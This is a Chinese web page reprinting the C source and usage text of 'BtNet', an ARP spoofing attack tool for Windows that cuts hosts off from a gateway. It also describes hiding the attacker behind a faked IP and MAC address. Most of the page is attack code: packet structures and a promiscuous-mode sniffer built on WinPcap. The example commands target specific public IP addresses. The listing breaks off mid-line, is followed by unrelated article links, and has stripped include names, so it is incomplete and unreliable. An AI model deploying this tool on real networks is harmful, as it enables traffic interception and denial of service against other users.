基于ARP欺骗的网络攻击程序源码
2008-11-21 13:34:20 来源:WEB开发网再说一下,以上测试只对于windows系统,当然也测试过对没有配置好的Red Hat成功过。
测试程序(BtNet.exe)说明:
Usage: BtNet -h attackIP -o gateIP [-m spoofedMAC]
-m参数是你要修改的源MAC地址.
为了隐蔽攻击者身份,程序再得到目标主机MAC地址时伪装成IP:128.128.128.128,MAC:a5-a5-a5-a5-a5-a5,可能会得不到目标主机的MAC地址,那么要得到MAC地址请借助第三方工具。
附测试程序代码
#include "packet32.h"
#include "ntddndis.h"
#include
#include
#include
#include
#pragma comment(lib,"ws2_32")
#pragma comment(lib,"packet")
#define ETH_IP 0x0800
#define ETH_ARP 0x0806
#define ARP_REQUEST 0x0001 //arp请求包
#define ARP_REPLY 0x0002 //arp应答包
#define ARP_HARDWARE 0x0001
#define max_num_adapter 10
#pragma pack(push,1)
typedef struct ethdr
{
unsigned char eh_dst[6]; //以太网目的地址
unsigned char eh_src[6]; //以太网源地址
unsigned short eh_type; //
}ETHDR,*PETHDR;
typedef struct arphdr //arp头
{
unsigned short arp_hdr; //硬件类型
unsigned short arp_pro; //协议类型
unsigned char arp_hln; //硬件地址长度
unsigned char arp_pln; //协议地址长度
unsigned short arp_opt; //
unsigned char arp_sha[6]; //发送端以太网地址
unsigned long arp_spa; //发送端ip地址
unsigned char arp_tha[6]; //接收端以太网地址
unsigned long arp_tpa; //接收端ip地址
}ARPHDR,*PARPHDR;
typedef struct ip_mac
{
u_long ip;
unsigned char mac[6];
}IP_MAC,*PIP_MAC;
#pragma pack(push)
LPADAPTER lpAdapter;
char adapterlist[max_num_adapter][1024];
IP_MAC toipandmac;
IP_MAC oipandmac,myipandmac;
BOOL param6=FALSE;
char *noMACstr;
char noMAC[6][3];
u_long mytoIP,oIP;
BOOL sendtoOip;
MSG msg;
UINT newtimer;
char MYIP[20]="128.128.128.128";
BOOL toipandmac_flag=FALSE,myipandmac_flag=FALSE,oipandmac_flag=FALSE;
int getint(char c)
{
int t=-1;
if((c<='9')&&(c>='0'))
t=c-'0';
else if((c>='a')&&(c<='f'))
t=10+c-'a';
else if((c>='A')&&(c<='F'))
t=10+c-'A';
return t;
}
void start()
{
printf("BtNet //--an ARP Tool test the Windows Break the Internetn");
printf("written by Ruder,10/2003n");
printf("Homepage: http://xEyes.cdut.net/ruder/index.htm;n");
printf("E-mail: cocoruder@163.comn");
printf("nUsage: BtNet -h attackIP -o gateIP [-m spoofedMAC]n");
printf("Example:n");
printf("BtNet -h 202.115.138.12 -o 202.115.138.1n");
printf("BtNet -h 202.115.138.12 -o 202.115.138.1 -m 00-50-fc-6a--6b--7cn");
printf(" Warning: You must have installed the winpcap_2.3 or
winpcap_3.0_alphan");
return ;
}
DWORD WINAPI sniff(LPVOID)
{
LPPACKET lppackets,lpPacketr;
char recvbuf[1024*250];
ULONG ulbytesreceived,off;
ETHDR *eth;
ARPHDR *arp;
char *buf,*pChar,*base;
char szTemp[20];
struct bpf_hdr *hdr;
if((lppackets=PacketAllocatePacket())==FALSE)
{
printf("PacketAllocatePacket send Error: %dn",GetLastError());
return 0;
}
if(PacketSetHwFilter(lpAdapter,NDIS_PACKET_TYPE_PROMISCUOUS)==FALSE)
{
printf("Warning: Unable to set the adapter to promiscuous moden");
}
if(PacketSetBuff(lpAdapter,500*1024)==FALSE)
{
printf("PacketSetBuff Error: %dn",GetLastError());
return 0;
}
if(PacketSetReadTimeout(lpAdapter,1)==FALSE)
{
printf("Warning: Unable to set the timeoutn");
}
if((lpPacketr=PacketAllocatePacket())==FALSE)
{
printf("PacketAllocatePacket receive Error: %dn",GetLastError());
return 0;
}
PacketInitPacket(lpPacketr,(char *)recvbuf,sizeof(recvbuf));
while(!kbhit())
{
if(PacketReceivePacket(lpAdapter,lpPacketr,TRUE)==FALSE)
{
return 0;
}
//getdata(lppacketr,option);
ulbytesreceived=lpPacketr->ulBytesReceived;
buf=(char *)lpPacketr->Buffer;
off=0;
while(off{
if(kbhit())
{
return 0;
}
hdr=(struct bpf_hdr *)(buf+off);
off+=hdr->bh_hdrlen;
pChar=(char *)(buf+off);
base=pChar;
off=Packet_WORDALIGN(off+hdr->bh_caplen);
eth=(PETHDR)pChar; //以太头
arp=(PARPHDR)(pChar+sizeof(ETHDR)); //arp头
int i;
if((eth->eh_type==htons(ETH_ARP))&&
(arp->arp_opt==htons(ARP_REPLY)))
{
//if (arp->arp_tpa==htonl(ntohl(inet_addr(MYIP))))
{
if(oipandmac_flag&&myipandmac_flag&&toipandmac_flag)
return 0;
if (((toipandmac.ip==htonl(arp->arp_spa))&&(toipandmac_flag==FALSE))
||((myipandmac.ip==htonl(arp->arp_spa))&&(myipandmac_flag==FALSE))
||((oipandmac.ip==htonl(arp->arp_spa))&&(oipandmac_flag==FALSE)))
{
memset(szTemp,0,sizeof(szTemp));
memcpy(szTemp,&arp->arp_spa,sizeof(arp->arp_spa));
printf("[IP]:");
printf("%s",inet_ntoa(*((struct in_addr *)szTemp)));
pr
- ››基于IP地址的vsftp服务器
- ››基于MySQL 水平分区的优化示例
- ››基于CentOS5的Linux下pptp和openvpn的搭建及配置
- ››基于JavaScript的网页版塔防游戏
- ››基于Android平台 QQ大战360手机游戏爆红
- ››基于Windows Azure的云计算应用设计
- ››基于AES算法实现对数据的加密
- ››基于SoPC目标板Flash编程设计的创建及应用
- ››基于SolidWarks齿轮机构的运动分析与仿真
- ››基于Windwos Server 2008故障转移群
- ››基于JavaScript的REST客户端框架
- ››基于JavaScript和CSS的Web图表框架横向对比
更多精彩
赞助商链接